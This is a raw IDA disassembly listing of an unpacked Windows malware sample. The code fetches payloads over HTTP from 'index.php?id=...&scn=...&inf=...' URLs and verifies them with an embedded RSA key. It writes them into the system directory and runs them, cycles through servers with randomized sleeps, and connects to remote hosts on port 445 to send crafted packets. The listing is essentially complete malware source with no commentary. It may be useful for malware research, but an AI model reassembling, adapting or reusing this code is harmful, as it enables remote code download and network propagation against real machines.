;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BE1C56928C2429894A1F59355E8FB8B4
; File Name : u:\work\be1c56928c2429894a1f59355e8fb8b4_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DD590Bh ; DATA XREF: sub_314228DB+1A�r
dword_31421004 dd 77DD59F0h ; DATA XREF: sub_314228DB+38�r
dword_31421008 dd 77DD23D7h ; DATA XREF: sub_31422882+3E�r
dword_3142100C dd 77DD22EAh ; DATA XREF: sub_3142284D+14�r
; sub_31422882+1D�r
dword_31421010 dd 77DD5C55h ; DATA XREF: sub_3142284D+24�r
dword_31421014 dd 77DD189Ah ; DATA XREF: sub_3142284D+2D�r
; sub_31422882+4E�r ...
dword_31421018 dd 77E2A571h ; DATA XREF: sub_314223B2+17D�r
dword_3142101C dd 77DE089Eh ; DATA XREF: sub_3142179A+17�r
dword_31421020 dd 77DE07A3h ; DATA XREF: sub_3142179A+30�r
dword_31421024 dd 77DE0D79h ; DATA XREF: sub_3142179A+4D�r
dword_31421028 dd 77DE0343h ; DATA XREF: sub_3142179A+5B�r
dword_3142102C dd 77DE0AF0h ; DATA XREF: sub_3142177E+8�r
dword_31421030 dd 77DE042Eh ; DATA XREF: sub_3142177E+12�r
dword_31421034 dd 77DDEBA2h ; DATA XREF: sub_3142172F+6�r
dword_31421038 dd 77DE0BB2h ; DATA XREF: sub_3142172F+3D�r
align 10h
dword_31421040 dd 77E79E34h ; DATA XREF: sub_31422CB9+B�r
dword_31421044 dd 77E7980Ah ; DATA XREF: sub_31422CA5+D�r
dword_31421048 dd 77E7A099h ; DATA XREF: sub_31422B67+17�r
dword_3142104C dd 77E76A2Eh ; DATA XREF: sub_31422B67+E9�r
dword_31421050 dd 77E6BD13h ; DATA XREF: sub_31422A9B+71�r
dword_31421054 dd 77E684C6h ; DATA XREF: sub_31422A9B+B0�r
dword_31421058 dd 77EBB1E7h ; DATA XREF: sub_31422D2C�r
dword_3142105C dd 77EBA595h ; DATA XREF: sub_31422D26�r
dword_31421060 dd 77E616B4h ; DATA XREF: sub_3142292E+9B�r
dword_31421064 dd 77EBA6E9h ; DATA XREF: sub_31422D20�r
dword_31421068 dd 77E73167h ; DATA XREF: sub_31422712+13�r
; sub_31422B67+8F�r
dword_3142106C dd 77E737DEh ; DATA XREF: sub_314223B2+C8�r
dword_31421070 dd 77E79D5Bh ; DATA XREF: sub_3142239E+8�r
dword_31421074 dd 77E73628h ; DATA XREF: UPX0:31422346�r
; sub_31422A9B+F�r
dword_31421078 dd 77E79D8Ch ; DATA XREF: sub_314211A0+ED�r
dword_3142107C dd 77E77963h ; DATA XREF: sub_314211A0+B9�r
; sub_314211A0+F6�r ...
dword_31421080 dd 77E7A837h ; DATA XREF: sub_314211A0+8F�r
; sub_314221C4+57�r
dword_31421084 dd 77E74672h ; DATA XREF: sub_314211A0+5A�r
; sub_31421422+64�r ...
dword_31421088 dd 77E74155h ; DATA XREF: sub_314211A0+3D�r
; sub_31422A9B+40�r
dword_3142108C dd 77E704FCh ; DATA XREF: sub_314211A0+37�r
; sub_31422A9B+1B�r
dword_31421090 dd 77E7513Ch ; DATA XREF: sub_314215C7+29�r
dword_31421094 dd 77E61BE6h ; DATA XREF: sub_314216A2+7D�r
; sub_31421801+16C�r ...
dword_31421098 dd 77E775F1h ; DATA XREF: sub_314216A2+1�r
dword_3142109C dd 77E73BEFh ; DATA XREF: sub_31421801+4F�r
dword_314210A0 dd 77E79C90h ; DATA XREF: sub_31421D68+4D�r
dword_314210A4 dd 77E7A5FDh ; DATA XREF: sub_31421D68+13�r
; sub_31421DF0+2C�r
dword_314210A8 dd 77E805D8h ; DATA XREF: sub_31421D68+D�r
; sub_314223B2+116�r
dword_314210AC dd 77E61A90h ; DATA XREF: sub_31421DF0+BC�r
dword_314210B0 dd 77E706B7h ; DATA XREF: sub_31421DF0+8A�r
; sub_3142292E+92�r
dword_314210B4 dd 77E79F93h ; DATA XREF: sub_31421DF0+26�r
; UPX0:31422336�r
dword_314210B8 dd 77E7751Ah ; DATA XREF: sub_31421EFB+12�r
dword_314210BC dd 77E7C2C4h ; DATA XREF: sub_31421F29+8�r
dword_314210C0 dd 77E7AC37h ; DATA XREF: sub_31421F38+12�r
; sub_31421F52+12�r
dword_314210C4 dd 77E61BB8h ; DATA XREF: sub_31421FA3+38�r
dword_314210C8 dd 77E74A3Bh ; DATA XREF: sub_3142204E+13�r
dword_314210CC dd 77E73AB3h ; DATA XREF: sub_3142204E+8�r
dword_314210D0 dd 77E73C49h ; DATA XREF: sub_3142207E+137�r
; sub_314221C4+66�r ...
dword_314210D4 dd 77E777EFh ; DATA XREF: sub_3142207E+F4�r
; sub_314225C3+3F�r ...
dword_314210D8 dd 77E78B82h ; DATA XREF: sub_314221C4+92�r
dword_314210DC dd 77E793EFh ; DATA XREF: sub_314221C4+6E�r
dword_314210E0 dd 77E75CB5h ; DATA XREF: UPX0:31422370�r
; sub_31422A9B+C3�r
dword_314210E4 dd 77F5157Dh, 0 ; DATA XREF: UPX0:31422361�r
dword_314210EC dd 77C35280h ; DATA XREF: sub_31421EFB+22�r
dword_314210F0 dd 77C42E10h ; DATA XREF: sub_31422CE2�r
dword_314210F4 dd 77C43710h ; DATA XREF: sub_31422CDC�r
dword_314210F8 dd 77C43490h ; DATA XREF: sub_31422CD6�r
dword_314210FC dd 77C3528Dh ; DATA XREF: sub_314216A2:loc_314216FC�r
; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C43AB0h ; DATA XREF: sub_31421422+3C�r
; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C43500h ; DATA XREF: sub_31421316+37�r
; sub_31421422+AA�r
align 10h
dword_31421110 dd 77D4BDCAh ; DATA XREF: sub_31421DF0+5D�r
dword_31421114 dd 77D4456Bh ; DATA XREF: sub_31421DF0+67�r
dword_31421118 dd 77D45CBCh ; DATA XREF: sub_31421DF0+7A�r
dword_3142111C dd 77D4C96Ah ; DATA XREF: sub_314215C7+5D�r
; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 76214750h ; DATA XREF: sub_314211A0+A9�r
; sub_314215C7+9D�r
dword_31421128 dd 7620AFB6h ; DATA XREF: sub_314211A0+18�r
; sub_314215C7+89�r
dword_3142112C dd 76204E4Dh ; DATA XREF: sub_314215C7+C5�r
dword_31421130 dd 762211EFh ; DATA XREF: sub_31422038+8�r
; UPX0:314227A2�r
dword_31421134 dd 7620BD61h ; DATA XREF: sub_314211A0+DB�r
; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB41DAh ; DATA XREF: sub_31422308+10�r
dword_31421140 dd 71AB3ECEh ; DATA XREF: sub_314221C4+100�r
dword_31421144 dd 71AB5DE2h ; DATA XREF: sub_314221C4+10D�r
dword_31421148 dd 71AB868Dh ; DATA XREF: sub_314221C4+120�r
dword_3142114C dd 71AB32CAh ; DATA XREF: sub_31421FF9+C�r
dword_31421150 dd 71AB1740h ; DATA XREF: sub_31421FF9+17�r
dword_31421154 dd 71AB2BBFh ; DATA XREF: sub_31421FF9+25�r
dword_31421158 dd 71AB3C22h ; DATA XREF: sub_31421801+2B�r
; sub_314221C4+AC�r
dword_3142115C dd 71AB401Ch ; DATA XREF: sub_31421801+44�r
; sub_31422712+D�r
dword_31421160 dd 71AB1746h ; DATA XREF: sub_31421801+147�r
; sub_314221C4+F0�r
dword_31421164 dd 71AB3E5Dh ; DATA XREF: sub_31421801+15D�r
dword_31421168 dd 71AB1AF4h ; DATA XREF: sub_31421801+17B�r
; sub_3142207E+67�r ...
dword_3142116C dd 71AB5690h ; DATA XREF: sub_31421801+1A4�r
; sub_31421801+1D8�r ...
dword_31421170 dd 71AB8629h ; DATA XREF: sub_31421801+550�r
; sub_3142207E+128�r
dword_31421174 dd 71AB1A6Dh ; DATA XREF: sub_31421801+559�r
; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31421422+5�o
dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_314223B2+5�o
dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlen
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlen
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aSqsfqbjdrkpbhb ; "sqsfqbjdrkpbhbxmjsw"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; InterlockedExchange
push 0
push offset dword_31424FEC
call ebx ; InterlockedExchange
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
